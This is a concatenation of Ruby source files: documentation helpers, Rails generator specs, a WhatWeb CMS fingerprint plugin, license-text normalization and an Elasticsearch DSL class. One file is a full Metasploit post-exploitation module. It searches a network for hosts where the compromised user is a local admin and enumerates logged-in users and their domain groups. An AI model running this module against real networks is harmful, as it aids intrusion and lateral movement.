      table = table.to_hash if table.respond_to?(:to_hash)
      table.except!(*Autodoc.configuration.suppressed_response_header)
      table.map {|key, value| [key, value].join(": ") }.sort.join("\n")
    end

    def response_http_version
      response.header["HTTP_VERSION"] || "HTTP/1.1"
    end

    def response_body_section
      "\n\n#{response_body}" if response_body.present?
    end

    # Pretty-printed response body (memoized; may legitimately memoize nil).
    # Image bodies are replaced by their content type.
    def response_body
      if instance_variable_defined?(:@response_body)
        @response_body
      else
        @response_body = begin
          case
          when response.header["Content-Type"].try(:include?, "image/")
            response.header["Content-Type"]
          when response.header["Content-Type"].try(:include?, "application/json")
            response_body_parsed_as_json
          else
            response.body
          end
        end
      end
    end

    # Returns nil (rather than raising) for unparsable JSON.
    def response_body_parsed_as_json
      JSON.pretty_generate(JSON.parse(response.body))
    rescue JSON::ParserError
    end

    def controller
      request.params[:controller]
    end

    def action
      request.params[:action]
    end

    def using_rack_test?
      !!defined?(Rack::Test::Methods) && @context.class.ancestors.include?(Rack::Test::Methods)
    end

    def transaction
      @transaction ||= Autodoc::Transaction.build(@context)
    end

    # Human description for the endpoint: the example group's description if
    # present, otherwise the example description capitalized with a period.
    def description
      if @context.respond_to?(:description)
        @context.description.strip_heredoc
      else
        example.description.sub(/\A./, &:upcase).concat('.')
      end
    end

    # Extracts the request path from the example's full description,
    # e.g. "GET /users/:id returns ..." -> "/users/:id".
    def path
      example.full_description[%r<(GET|POST|PATCH|PUT|DELETE) ([^ ]+)>, 2]
    end

    # "### Parameters" Markdown section built from WeakParameters validators,
    # or nil when there are none.
    def parameters_section
      if has_validators? && parameters.present?
        "\n### Parameters\n#{parameters}\n"
      end
    end

    def parameters
      validators.map {|validator| Parameter.new(validator) }.join("\n")
    end

    def has_validators?
      !!(defined?(WeakParameters) && validators)
    end

    def validators
      WeakParameters.stats[controller][action].try(:validators)
    end

    # Renders a single WeakParameters validator as a Markdown bullet,
    # recursing (with indentation) into nested validators.
    class Parameter
      attr_reader :validator

      def initialize(validator)
        @validator = validator
      end

      def to_s
        string = ""
        string << "#{body}#{payload}"
        if validator.respond_to? :validators
          validator.validators.each do |x|
            string << "\n"
            string << Parameter.new(x).to_s.indent(2)
          end
        end
        string
      end

      private

      # "* `key` type" — or just "* type" for keyless validators.
      def body
        if validator.key.nil?
          "* #{validator.type}"
        else
          "* `#{validator.key}` #{validator.type}"
        end
      end

      # Optional "(required, only: ...)" and "- description" suffixes.
      def payload
        string = ""
        string << " (#{assets.join(', ')})" if assets.any?
        string << " - #{validator.options[:description]}" if validator.options[:description]
        string
      end

      def assets
        @assets ||= [required, only, except].compact
      end

      def required
        "required" if validator.required?
      end

      def only
        "only: `#{validator.options[:only].inspect}`" if validator.options[:only]
      end

      def except
        "except: `#{validator.options[:except].inspect}`" if validator.options[:except]
      end
    end
  end
end
| 24.270758 | 113 | 0.607021 |
f8e26ba7e4fd14919fedea05af6ad9ef7a555ad0 | 4,092 | # frozen_string_literal: true
require 'spec_helper'
require 'generators/bounded_context/bounded_context_generator'
module BoundedContext
  module Generators
    # Acceptance-style specs for the bounded-context Rails generator: each
    # example runs the generator and asserts on the files it writes under
    # the generator's destination_root.
    RSpec.describe BoundedContextGenerator do
      # Matcher: file at the given relative path matches the expected content.
      RSpec::Matchers.define :match_content do |expected|
        match do |actual|
          @matcher = ::RSpec::Matchers::BuiltIn::Match.new(expected)
          @matcher.matches?(File.read(File.join(destination_root, actual)))
        end

        failure_message do
          @matcher.failure_message
        end
      end

      # Matcher: file exists at the given relative path under destination_root.
      RSpec::Matchers.define :exists_at_destination_path do |_|
        match do |actual|
          @matcher = ::RSpec::Matchers::BuiltIn::Exist.new(File.join(destination_root, actual))
          @matcher.matches?(File)
        end

        failure_message do
          @matcher.failure_message
        end
      end

      specify do
        run_generator %w[payments]

        expect('payments/lib/payments.rb').to match_content(<<~EOF)
          module Payments
          end
        EOF

        expect('config/application.rb').to match_content(<<~EOF)
          config.paths.add 'payments/lib', eager_load: true
        EOF
      end

      # CamelCase argument is underscored for paths, kept for the module name.
      specify do
        run_generator %w[Inventory]

        expect('inventory/lib/inventory.rb').to match_content(<<~EOF)
          module Inventory
          end
        EOF

        expect('config/application.rb').to match_content(<<~EOF)
          config.paths.add 'inventory/lib', eager_load: true
        EOF
      end

      specify do
        run_generator %w[mumbo_jumbo]

        expect('mumbo_jumbo/lib/mumbo_jumbo.rb').to match_content(<<~EOF)
          module MumboJumbo
          end
        EOF

        expect('config/application.rb').to match_content(<<~EOF)
          config.paths.add 'mumbo_jumbo/lib', eager_load: true
        EOF
      end

      specify do
        run_generator %w[identity_access --test_framework=rspec]

        expect_identity_access_spec_helper
        expect_identity_access_bc_spec
        expect_identity_access_require_bc_spec
      end

      specify do
        run_generator %w[IdentityAccess --test_framework=rspec]

        expect_identity_access_spec_helper
        expect_identity_access_bc_spec
        expect_identity_access_require_bc_spec
      end

      specify do
        run_generator %w[identity_access --test-framework=test_unit]

        expect_identity_access_test_helper
      end

      specify do
        run_generator %w[IdentityAccess --test-framework=test_unit]

        expect_identity_access_test_helper
      end

      # Invoking via the shell (system_run_generator) defaults to test_unit.
      specify do
        system_run_generator %w[IdentityAccess]

        expect_identity_access_test_helper
      end

      specify do
        run_generator %w[identity_access]

        expect('identity_access/lib/identity_access/.keep').to exists_at_destination_path
      end

      def expect_identity_access_spec_helper
        expect('identity_access/spec/spec_helper.rb').to match_content(<<~EOF)
          ENV['RAILS_ENV'] = 'test'

          $LOAD_PATH.push File.expand_path('../../../spec', __FILE__)
          require File.expand_path('../../../config/environment', __FILE__)
          require File.expand_path('../../../spec/rails_helper', __FILE__)

          require_relative '../lib/identity_access'
        EOF
      end

      def expect_identity_access_bc_spec
        expect('identity_access/spec/identity_access_spec.rb').to match_content(<<~EOF)
          require_relative 'spec_helper'

          RSpec.describe IdentityAccess do
          end
        EOF
      end

      def expect_identity_access_require_bc_spec
        expect('spec/identity_access_spec.rb').to match_content(<<~'EOF')
          require 'rails_helper'

          path = Rails.root.join('identity_access/spec')
          Dir.glob("#{path}/**/*_spec.rb") do |file|
            require file
          end
        EOF
      end

      def expect_identity_access_test_helper
        expect('identity_access/test/test_helper.rb').to match_content(<<~EOF)
          require_relative '../lib/identity_access'
        EOF
      end
    end
  end
end
| 28.027397 | 95 | 0.640518 |
33922862630b368ea61f2663ff886316cdd96069 | 312 | test_cask 'invalid-gpg-missing-key' do
version '1.2.3'
sha256 '9203c30951f9aab41ac294bbeb1dcef7bed401ff0b353dcb34d68af32ea51853'
url TestHelper.local_binary_url('caffeine.zip')
homepage 'http://example.com/invalid-gpg-missing-keys'
gpg 'http://example.com/gpg-signature.asc'
app 'Caffeine.app'
end
| 28.363636 | 75 | 0.778846 |
ff9c8cf9252bc152b5cd7baae2f9f6908e0437e5 | 1,248 | # frozen_string_literal: true
##
# This file is part of WhatWeb and may be subject to
# redistribution and commercial restrictions. Please see the WhatWeb
# web site for more information on licensing and terms of use.
# http://www.morningstarsecurity.com/research/whatweb
##
# WhatWeb fingerprint plugin for the Kajona CMS. Purely declarative: each
# entry in @matches is a WhatWeb matcher (keys such as :regexp, :text and
# :string follow the WhatWeb matcher DSL).
WhatWeb::Plugin.define "Kajona" do
  @author = "Brendan Coles <[email protected]>" # 2012-07-19
  @version = "0.1"
  @description = "Kajona - Open Source Content Management System - Requires PHP & MySQL"
  @website = "http://www.kajona.de/"

  # Matches #
  @matches = [

    # Meta Generator
    { regexp: /<meta name="generator" content="Kajona., www\.kajona\.de" \/>/ },

    # HTML Comment
    { regexp: /<!--\s+Website powered by Kajona. Open Source Content Management Framework/ },

    # JavaScript
    { regexp: /<script type="text\/javascript">KAJONA_(DEBUG|WEBPATH) = / },

    # Powered by text
    { text: '<div class="left">powered by Kajona</div>' },

    # Footer
    { text: '<div id="footerContainer">powered by <a href="http://www.kajona.de" target="_blank" title="Kajona' },

    # Admin Page # Footer # Year Detection
    { string: /<div class="copyright">&copy; (20[\d]{2}) <a href="http:\/\/www\.kajona\.de" target="_blank" title="Kajona/ },

  ]
end
6262ef25d1fedc7261bea5c25fab36dae71d0da6 | 653 | require "spec_helper"
describe "authentication homepage" do
it "allows registered and confirmed user to log in" do
# Creates a dummy user
user = User.create!(:email => "[email protected]",
:first_name => "Test",
:last_name => "User",
:password => "AutolabProject")
user.skip_confirmation!
user.save!
# Simulates user log in
visit "/auth/users/sign_in"
fill_in "user_email", :with => "[email protected]"
fill_in "user_password", :with => "AutolabProject"
click_button "Sign in"
expect(page).to have_content 'Signed in successfully.'
end
end
| 28.391304 | 58 | 0.601838 |
91966b04a1a0525c8f172445a71db9d832425fa1 | 1,627 | require "json"
require "faraday"
require "eth"
require "bip44"
require 'bigdecimal'
# Namespace for the token/blockchain adapters loaded below. Holds a
# module-wide logger plus the error hierarchy shared by every adapter.
module TokenAdapter
  # Module-level logger reader/writer (replaces the
  # `class << self; attr_accessor :logger; end` idiom).
  def self.logger
    @logger
  end

  def self.logger=(logger)
    @logger = logger
  end

  # Error type for JSON-RPC failures.
  class JSONRPCError < RuntimeError; end
  # Error type for transaction-hash problems.
  class TxHashError < StandardError; end
  # Error type for refused node connections.
  class ConnectionRefusedError < StandardError; end
  # Error type for transaction failures.
  class TransactionError < StandardError; end
end
require "token_adapter/client/json_rpc"
require "token_adapter/client/ethereum"
require "token_adapter/version"
require "token_adapter/base"
require "token_adapter/ethereum"
require "token_adapter/ethereum/eth"
require "token_adapter/ethereum/erc20"
require "token_adapter/ethereum/atm"
require "token_adapter/ethereum/eos"
require "token_adapter/ethereum/snt"
require "token_adapter/ethereum/bat"
require "token_adapter/ethereum/omg"
require "token_adapter/ethereum/mkr"
require "token_adapter/ethereum/mht"
require "token_adapter/ethereum/cxtc"
require "token_adapter/ethereum/bpt"
require "token_adapter/ethereum/egt"
require "token_adapter/ethereum/fut"
require "token_adapter/ethereum/trx"
require "token_adapter/ethereum/icx"
require "token_adapter/ethereum/ncs"
require "token_adapter/ethereum/sda"
require "token_adapter/ethereum/icc"
require "token_adapter/ethereum/mag"
require "token_adapter/ethereum/erc223"
require "token_adapter/ethereum/ext"
require "token_adapter/ethereum/fllw"
require "token_adapter/ethereum/wbt"
require "token_adapter/ethereum/gst"
require "token_adapter/ethereum/moac"
require "token_adapter/ethereum/ser"
require "token_adapter/btc"
require "token_adapter/ltc"
require "token_adapter/zec"
require "token_adapter/doge"
require "token_adapter/usdt"
| 29.053571 | 51 | 0.822372 |
618f9a462d1d4572228ffc1602b4bc5aa8fa2485 | 8,654 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
# Post module: finds hosts where the current domain user has local admin
# rights (via OpenSCManagerA), optionally enumerating logged-in users and
# their domain group membership through Railgun.
class Metasploit3 < Msf::Post

  include Msf::Post::Windows::Priv
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Post::Common

  def initialize(info={})
    super(update_info(info,
      'Name'         => 'Windows Gather Local Admin Search',
      'Description'  => %q{
        This module will identify systems in a given range that the
        supplied domain user (should migrate into a user pid) has administrative
        access to by using the Windows API OpenSCManagerA to establishing a handle
        to the remote host. Additionally it can enumerate logged in users and group
        membership via Windows API NetWkstaUserEnum and NetUserGetGroups.
      },
      'License'      => MSF_LICENSE,
      'Author'       =>
        [
          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
          'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
          'Royce Davis "r3dy" <rdavis[at]accuvant.com>'
        ],
      'Platform'     => [ 'windows'],
      'SessionTypes' => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptBool.new('ENUM_USERS', [ true, 'Enumerates logged on users.', true]),
        OptBool.new('ENUM_GROUPS', [ false, 'Enumerates groups for identified users.', true]),
        OptString.new('DOMAIN', [false, 'Domain to enumerate user\'s groups for']),
        OptString.new('DOMAIN_CONTROLLER', [false, 'Domain Controller to query groups'])
      ], self.class)
  end

  # Resolves the domain and domain controller to use, falling back to the
  # session's own domain and the DC that applied group policy.
  def setup
    super

    # This datastore option can be modified during runtime.
    # Saving it here so the modified value remains with this module.
    @domain_controller = datastore['DOMAIN_CONTROLLER']

    if is_system?
      # running as SYSTEM and will not pass any network credentials
      print_error "Running as SYSTEM, module should be run with USER level rights"
      return
    else
      @adv = client.railgun.advapi32

      # Get domain and domain controller if options left blank
      if datastore['DOMAIN'].nil? or datastore['DOMAIN'].empty?
        user = client.sys.config.getuid
        datastore['DOMAIN'] = user.split('\\')[0]
      end

      # BUGFIX: this previously tested the misspelled ivar @domain_controll
      # (always nil), so gpresult-based auto-detection ran and clobbered an
      # explicitly supplied DOMAIN_CONTROLLER.
      if @domain_controller.nil? and datastore['ENUM_GROUPS']
        @dc_error = false

        # Uses DC which applied policy since it would be a DC this device normally talks to
        cmd = "gpresult /SCOPE COMPUTER"
        # If Vista/2008 or later add /R
        if (sysinfo['OS'] =~ /Build [6-9]\d\d\d/)
          cmd << " /R"
        end
        res = cmd_exec("cmd.exe","/c #{cmd}")

        # Check if RSOP data exists, if not disable group check
        unless res =~ /does not have RSOP data./
          dc_applied = /Group Policy was applied from:\s*(.*)\s*/.match(res)
          if dc_applied
            @domain_controller = dc_applied[1].strip
          else
            @dc_error = true
            print_error("Could not read RSOP data, will not enumerate users and groups. Manually specify DC.")
          end
        else
          @dc_error = true
          print_error("User never logged into device, will not enumerate users and groups. Manually specify DC.")
        end
      end
    end
  end

  # main control method
  def run_host(ip)
    connect(ip)
  end

  # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370669(v=vs.85).aspx
  # Enumerate logged in users on +host+; returns an array of report lines.
  def enum_users(host)
    userlist = Array.new

    begin
      # Connect to host and enumerate logged in users
      winsessions = client.railgun.netapi32.NetWkstaUserEnum("\\\\#{host}", 1, 4, -1, 4, 4, nil)
    rescue ::Exception => e
      print_error("Issue enumerating users on #{host}")
      return userlist
    end

    return userlist if winsessions.nil?

    count = winsessions['totalentries'] * 2
    startmem = winsessions['bufptr']
    base = 0

    begin
      mem = client.railgun.memread(startmem, 8*count)
    rescue ::Exception => e
      print_error("Issue reading memory for #{host}")
      vprint_error(e.to_s)
      return userlist
    end

    # For each entry returned, get domain and name of logged in user
    begin
      count.times{|i|
        temp = {}
        userptr = mem[(base + 0),4].unpack("V*")[0]
        temp[:user] = client.railgun.memread(userptr,255).split("\0\0")[0].split("\0").join
        nameptr = mem[(base + 4),4].unpack("V*")[0]
        temp[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join

        # Ignore if empty or machine account
        unless temp[:user].empty? or temp[:user][-1, 1] == "$"
          # Check if enumerated user's domain matches supplied domain, if there was
          # an error, or if option disabled
          data = ""
          if datastore['DOMAIN'].upcase == temp[:domain].upcase and not @dc_error and datastore['ENUM_GROUPS']
            data << " - Groups: #{enum_groups(temp[:user]).chomp(", ")}"
          end

          line = "\tLogged in user:\t#{temp[:domain]}\\#{temp[:user]}#{data}\n"

          # Write user and groups to notes database
          db_note(host, "#{temp[:domain]}\\#{temp[:user]}#{data}", "localadmin.user.loggedin")
          userlist << line unless userlist.include? line
        end

        base = base + 8
      }
    rescue ::Exception => e
      print_error("Issue enumerating users on #{host}")
      # BUGFIX: backtrace is an Array; join it so vprint_error gets a String.
      vprint_error(e.backtrace.join("\n"))
    end
    return userlist
  end

  # http://msdn.microsoft.com/en-us/library/windows/desktop/aa370653(v=vs.85).aspx
  # Enumerate domain groups for +user+ by querying the domain controller;
  # returns a comma-separated string of group names.
  def enum_groups(user)
    grouplist = ""
    dc = "\\\\#{@domain_controller}"
    begin
      # Connect to DC and enumerate groups of user
      usergroups = client.railgun.netapi32.NetUserGetGroups(dc, user, 0, 4, -1, 4, 4)
    rescue ::Exception => e
      print_error("Issue connecting to DC, try manually setting domain and DC")
      vprint_error(e.to_s)
      return grouplist
    end

    count = usergroups['totalentries']
    startmem = usergroups['bufptr']
    base = 0

    begin
      mem = client.railgun.memread(startmem, 8*count)
    rescue ::Exception => e
      print_error("Issue reading memory for groups for user #{user}")
      vprint_error(e.to_s)
      return grouplist
    end

    begin
      # For each entry returned, get group
      count.to_i.times{|i|
        temp = {}
        groupptr = mem[(base + 0),4].unpack("V*")[0]
        temp[:group] = client.railgun.memread(groupptr,255).split("\0\0")[0].split("\0").join

        # Add group to string to be returned
        grouplist << "#{temp[:group]}, "
        if (i % 5) == 2
          grouplist <<"\n\t- "
        end
        base = base + 4
      }
    rescue ::Exception => e
      print_error("Issue enumerating groups for user #{user}, check domain")
      # BUGFIX: backtrace is an Array; join it so vprint_error gets a String.
      vprint_error(e.backtrace.join("\n"))
      return grouplist
    end
    return grouplist.chomp("\n\t- ")
  end

  # http://msdn.microsoft.com/en-us/library/windows/desktop/ms684323(v=vs.85).aspx
  # Attempts OpenSCManagerA against +host+; success implies local admin.
  def connect(host)
    if @adv.nil?
      return
    end
    user = client.sys.config.getuid

    # use railgun and OpenSCManagerA api to connect to remote host
    manag = @adv.OpenSCManagerA("\\\\#{host}", nil, 0xF003F) # SC_MANAGER_ALL_ACCESS

    if(manag["return"] != 0) # we have admin rights
      result = "#{host.ljust(16)} #{user} - Local admin found\n"

      # Run enumerate users on all hosts if option was set
      if datastore['ENUM_USERS']
        enum_users(host).each {|i|
          result << i
        }
      end

      # close the handle if connection was made
      @adv.CloseServiceHandle(manag["return"])

      # Append data to loot table within database
      print_good(result.chomp("\n")) unless result.nil?
      db_loot(host, user, "localadmin.user")
    else
      # we dont have admin rights
      print_error("#{host.ljust(16)} #{user} - No Local Admin rights")
    end
  end

  # Write to notes database
  def db_note(host, data, type)
    report_note(
      :type => type,
      :data => data,
      :host => host,
      :update => :unique_data
    )
  end

  # Write to loot database
  def db_loot(host, user, type)
    p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user)
    vprint_status("User data stored in: #{p}")
  end
end
| 32.656604 | 113 | 0.618096 |
03483bffbe2fe632840d9b1998d3ba00e7345faa | 9,250 | require 'set'
require 'digest'
module Licensee
module ContentHelper
DIGEST = Digest::SHA1
START_REGEX = /\A\s*/.freeze
END_OF_TERMS_REGEX = /^[\s#*_]*end of terms and conditions\s*$/i.freeze
ALT_TITLE_REGEX = License::ALT_TITLE_REGEX
REGEXES = {
hrs: /^\s*[=\-\*]{3,}\s*$/,
all_rights_reserved: /#{START_REGEX}all rights reserved\.?$/i,
whitespace: /\s+/,
markdown_headings: /#{START_REGEX}#+/,
version: /#{START_REGEX}version.*$/i,
span_markup: /[_*~]+(.*?)[_*~]+/,
link_markup: /\[(.+?)\]\(.+?\)/,
block_markup: /^\s*>/,
border_markup: /^[\*-](.*?)[\*-]$/,
comment_markup: %r{^\s*?[/\*]{1,2}},
url: %r{#{START_REGEX}https?://[^ ]+\n},
bullet: /\n\n\s*(?:[*-]|\(?[\da-z]{1,2}[)\.])\s+/i,
developed_by: /#{START_REGEX}developed by:.*?\n\n/im,
quote_begin: /[`'"‘“]/,
quote_end: /[`'"’”]/
}.freeze
NORMALIZATIONS = {
lists: { from: /^\s*(?:\d\.|\*)\s+([^\n])/, to: '- \1' },
https: { from: /http:/, to: 'https:' },
ampersands: { from: '&', to: 'and' },
dashes: { from: /(?<!^)([—–-]+)(?!$)/, to: '-' },
quotes: {
from: /#{REGEXES[:quote_begin]}+([\w -]*?\w)#{REGEXES[:quote_end]}+/,
to: '"\1"'
}
}.freeze
# Legally equivalent words that schould be ignored for comparison
# See https://spdx.org/spdx-license-list/matching-guidelines
VARIETAL_WORDS = {
'acknowledgment' => 'acknowledgement',
'analogue' => 'analog',
'analyse' => 'analyze',
'artefact' => 'artifact',
'authorisation' => 'authorization',
'authorised' => 'authorized',
'calibre' => 'caliber',
'cancelled' => 'canceled',
'capitalisations' => 'capitalizations',
'catalogue' => 'catalog',
'categorise' => 'categorize',
'centre' => 'center',
'emphasised' => 'emphasized',
'favour' => 'favor',
'favourite' => 'favorite',
'fulfil' => 'fulfill',
'fulfilment' => 'fulfillment',
'initialise' => 'initialize',
'judgment' => 'judgement',
'labelling' => 'labeling',
'labour' => 'labor',
'licence' => 'license',
'maximise' => 'maximize',
'modelled' => 'modeled',
'modelling' => 'modeling',
'offence' => 'offense',
'optimise' => 'optimize',
'organisation' => 'organization',
'organise' => 'organize',
'practise' => 'practice',
'programme' => 'program',
'realise' => 'realize',
'recognise' => 'recognize',
'signalling' => 'signaling',
'sub-license' => 'sublicense',
'sub license' => 'sublicense',
'utilisation' => 'utilization',
'whilst' => 'while',
'wilful' => 'wilfull',
'non-commercial' => 'noncommercial',
'cent' => 'percent',
'owner' => 'holder'
}.freeze
STRIP_METHODS = %i[
hrs markdown_headings borders title version url copyright
block_markup span_markup link_markup
all_rights_reserved developed_by end_of_terms whitespace
].freeze
# The distinct words of the normalized license text, as a Set.
# Returns nil when there is no normalized content. Memoized.
def wordset
  @wordset ||= content_normalized&.scan(/(?:\w(?:'s|(?<=s)')?)+/)&.to_set
end
# Number of characters in the normalized content (0 when there is none).
def length
  content_normalized ? content_normalized.length : 0
end
# Number of characters that could be added/removed to still be
# considered a potential match
# Memoized; proportional to the normalized content length.
def max_delta
@max_delta ||= (length * Licensee.inverse_confidence_threshold).to_i
end
# Absolute difference between this file's normalized length and the
# other license/project file's normalized length.
def length_delta(other)
  (other.length - length).abs
end
# Sørensen–Dice similarity between this file's wordset and another's,
# expressed as a percentage (0.0..100.0).
def similarity(other)
  mine = wordset
  theirs = other.wordset
  overlap = (mine & theirs).size
  100.0 * (overlap * 2.0 / (mine.size + theirs.size))
end
# SHA1 of the normalized content
# Memoized. DIGEST is declared outside this view — presumably
# Digest::SHA1 given the comment above; confirm where it is defined.
def content_hash
@content_hash ||= DIGEST.hexdigest content_normalized
end
# Content with the title and version removed
# The first time should normally be the attribution line
# Used to dry up `content_normalized` but we need the case sensitive
# content with attribution first to detect attribution in LicenseFile
def content_without_title_and_version
@content_without_title_and_version ||= begin
# Reset the working-copy cache so _content re-reads the raw content.
@_content = nil
ops = %i[html hrs comments markdown_headings title version]
ops.each { |op| strip(op) }
_content
end
end
# Fully normalized content: downcased, spelling/markup normalizations
# applied, then all STRIP_METHODS run. The unwrapped form is memoized;
# line-wrapping (if requested) is applied per call.
def content_normalized(wrap: nil)
@content_normalized ||= begin
@_content = content_without_title_and_version.downcase
(NORMALIZATIONS.keys + %i[spelling bullets]).each { |op| normalize(op) }
STRIP_METHODS.each { |op| strip(op) }
_content
end
if wrap.nil?
@content_normalized
else
Licensee::ContentHelper.wrap(@content_normalized, wrap)
end
end
# Backwards-compatibility shim: old FOO_REGEX constants resolve to the
# corresponding REGEXES entry, avoiding a breaking change.
def self.const_missing(const)
key = const.to_s.downcase.gsub('_regex', '').to_sym
REGEXES[key] || super
end
# Wrap text to the given line length
# Bullets are isolated onto their own paragraphs, single newlines are
# joined into paragraphs, then each line longer than line_width is
# re-wrapped (horizontal rules are left untouched).
def self.wrap(text, line_width = 80)
return if text.nil?
text = text.clone
text.gsub!(REGEXES[:bullet]) { |m| "\n#{m}\n" }
text.gsub!(/([^\n])\n([^\n])/, '\1 \2')
text = text.split("\n").collect do |line|
if line =~ REGEXES[:hrs]
line
elsif line.length > line_width
line.gsub(/(.{1,#{line_width}})(\s+|$)/, "\\1\n").strip
else
line
end
end * "\n"
text.strip
end
# Render a float as a percentage string with two decimal places.
def self.format_percent(float)
  format('%.2f%%', float)
end
# Union regex matching any known license title (with or without version).
# Memoized at the module level.
# NOTE(review): 'psuedo' looks misspelled — confirm it is the keyword
# License.all actually accepts before changing it.
def self.title_regex
@title_regex ||= begin
licenses = Licensee::License.all(hidden: true, psuedo: false)
titles = licenses.map(&:title_regex)
# Title regex must include the version to support matching within
# families, but for sake of normalization, we can be less strict
without_versions = licenses.map do |license|
next if license.title == license.name_without_version
Regexp.new Regexp.escape(license.name_without_version), 'i'
end
titles.concat(without_versions.compact)
/#{START_REGEX}\(?(?:the )?#{Regexp.union titles}.*?$/i
end
end
private
# Mutable working copy of the raw content, stripped of surrounding
# whitespace; the strip/normalize pipeline mutates this in place.
def _content
@_content ||= content.to_s.dup.strip
end
# Remove a pattern from the working content. Accepts either a Regexp or
# a Symbol; a Symbol dispatches to a strip_<name> method when one exists,
# otherwise it must name a REGEXES entry.
def strip(regex_or_sym)
return unless _content
if regex_or_sym.is_a?(Symbol)
meth = "strip_#{regex_or_sym}"
return send(meth) if respond_to?(meth, true)
unless REGEXES[regex_or_sym]
raise ArgumentError, "#{regex_or_sym} is an invalid regex reference"
end
regex_or_sym = REGEXES[regex_or_sym]
end
# Replace matches with a space, then collapse runs of spaces.
@_content = _content.gsub(regex_or_sym, ' ').squeeze(' ').strip
end
# Strip every occurrence of a known license title (repeat until none match).
def strip_title
while _content =~ ContentHelper.title_regex
strip(ContentHelper.title_regex)
end
end
# Remove decorative border characters, keeping the captured inner text.
def strip_borders
normalize(REGEXES[:border_markup], '\1')
end
# Strip comment markers, but only when the whole (multi-line) content is
# commented — a partially commented file is left untouched.
def strip_comments
lines = _content.split("\n")
return if lines.count == 1
return unless lines.all? { |line| line =~ REGEXES[:comment_markup] }
strip(:comment_markup)
end
# Remove copyright notices (repeat until none match).
def strip_copyright
regex = Matchers::Copyright::REGEX
strip(regex) while _content =~ regex
end
# Drop everything from the end-of-terms marker onward (usually
# instructions that follow the legal text).
def strip_end_of_terms
body, _partition, _instructions = _content.partition(END_OF_TERMS_REGEX)
@_content = body
end
# Remove inline span markup, keeping the captured inner text.
def strip_span_markup
normalize(REGEXES[:span_markup], '\1')
end
# Remove link markup, keeping the captured link text.
def strip_link_markup
normalize(REGEXES[:link_markup], '\1')
end
# Convert HTML files to markdown before further stripping. Only applies
# when the including class exposes a .html/.htm filename. Lazily requires
# the third-party reverse_markdown gem.
def strip_html
return unless respond_to?(:filename) && filename
return unless File.extname(filename) =~ /\.html?/i
require 'reverse_markdown'
@_content = ReverseMarkdown.convert(_content, unknown_tags: :bypass)
end
# Apply a substitution to the working content. With an explicit `to`,
# performs a direct gsub; with a single Symbol/key, looks up the
# NORMALIZATIONS entry or dispatches to a normalize_<name> method.
def normalize(from_or_key, to = nil)
operation = { from: from_or_key, to: to } if to
operation ||= NORMALIZATIONS[from_or_key]
if operation
@_content = _content.gsub operation[:from], operation[:to]
elsif respond_to?("normalize_#{from_or_key}", true)
send("normalize_#{from_or_key}")
else
raise ArgumentError, "#{from_or_key} is an invalid normalization"
end
end
# Rewrite varietal spellings to their canonical form (hash-based gsub:
# each matched word is replaced via the VARIETAL_WORDS lookup).
def normalize_spelling
normalize(/\b#{Regexp.union(VARIETAL_WORDS.keys)}\b/, VARIETAL_WORDS)
end
# Canonicalize list bullets to "* " paragraphs and close up gaps
# between adjacent parenthesized groups.
def normalize_bullets
normalize(REGEXES[:bullet], "\n\n* ")
normalize(/\)\s+\(/, ')(')
end
end
end
| 31.144781 | 80 | 0.571784 |
ac33a63edcf1f95184063da205511a7ec5ad2053 | 234 | set_name 'ProductInterest'
# Model-generator DSL: field declarations and admin view configuration
# for the ProductInterest model (set_name appears above).
set_fields(
product: :belongs_to,
owner: :'references{polymorphic}'
)
# Render with the single-page manager layout.
set_view_schema :single_page_manager
# Show the product by name, linked to the product record.
describe_belongs_to_field :product, :Product, :product, :name, :link_to
describe_owner_field
| 19.5 | 71 | 0.799145 |
9116943bc5032f6cd52fcf2a72e8ac79f7bf49da | 335 | class Company < ActiveRecord::Base
belongs_to :industry
# Managers point back via a non-conventional foreign key.
has_many :managers, :foreign_key => :manages_company_id
# Self-referential tree: a company may have a parent and children.
belongs_to :parent, :class_name => 'Company', :foreign_key => 'parent_id'
has_many :children, :class_name => 'Company', :foreign_key => 'parent_id'
# counter_culture keeps parent.children_count in sync automatically.
counter_culture :parent, :column_name => :children_count
end
| 27.916667 | 75 | 0.734328 |
4ab07be989bd1ff1bcd86c0862519e19a6842cbf | 378 | class UseVdaysVpositionsDefaults < ActiveRecord::Migration
def up
# Give the virtual-days / virtual-positions toggles an explicit
# database default of disabled instead of NULL.
change_column :conferences, :use_vpositions, :boolean, default: false
change_column :conferences, :use_vdays, :boolean, default: false
end
def down
# Restore the previous state: no database-level default.
change_column :conferences, :use_vpositions, :boolean, default: nil
change_column :conferences, :use_vdays, :boolean, default: nil
end
end
| 31.5 | 73 | 0.759259 |
1a0555be67d8d81207a77612a316aac2eac61f6e | 1,667 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module DSL
module Search
module Aggregations
# A multi-value metrics aggregation which calculates percentile ranks on numeric values
#
# @example
#
# search do
# aggregation :load_time_outliers do
# percentile_ranks do
# field 'load_time'
# values [ 15, 30 ]
# end
# end
# end
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-percentile-rank-aggregation.html
#
class PercentileRanks
include BaseComponent
# DSL option setters for the percentile_ranks aggregation body
# (option_method is provided by BaseComponent).
option_method :field
option_method :values
option_method :script
option_method :params
option_method :compression
end
end
end
end
end
| 32.057692 | 139 | 0.656269 |
38e19bfb4010476f92009207c0adc1345cc9626b | 2,139 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
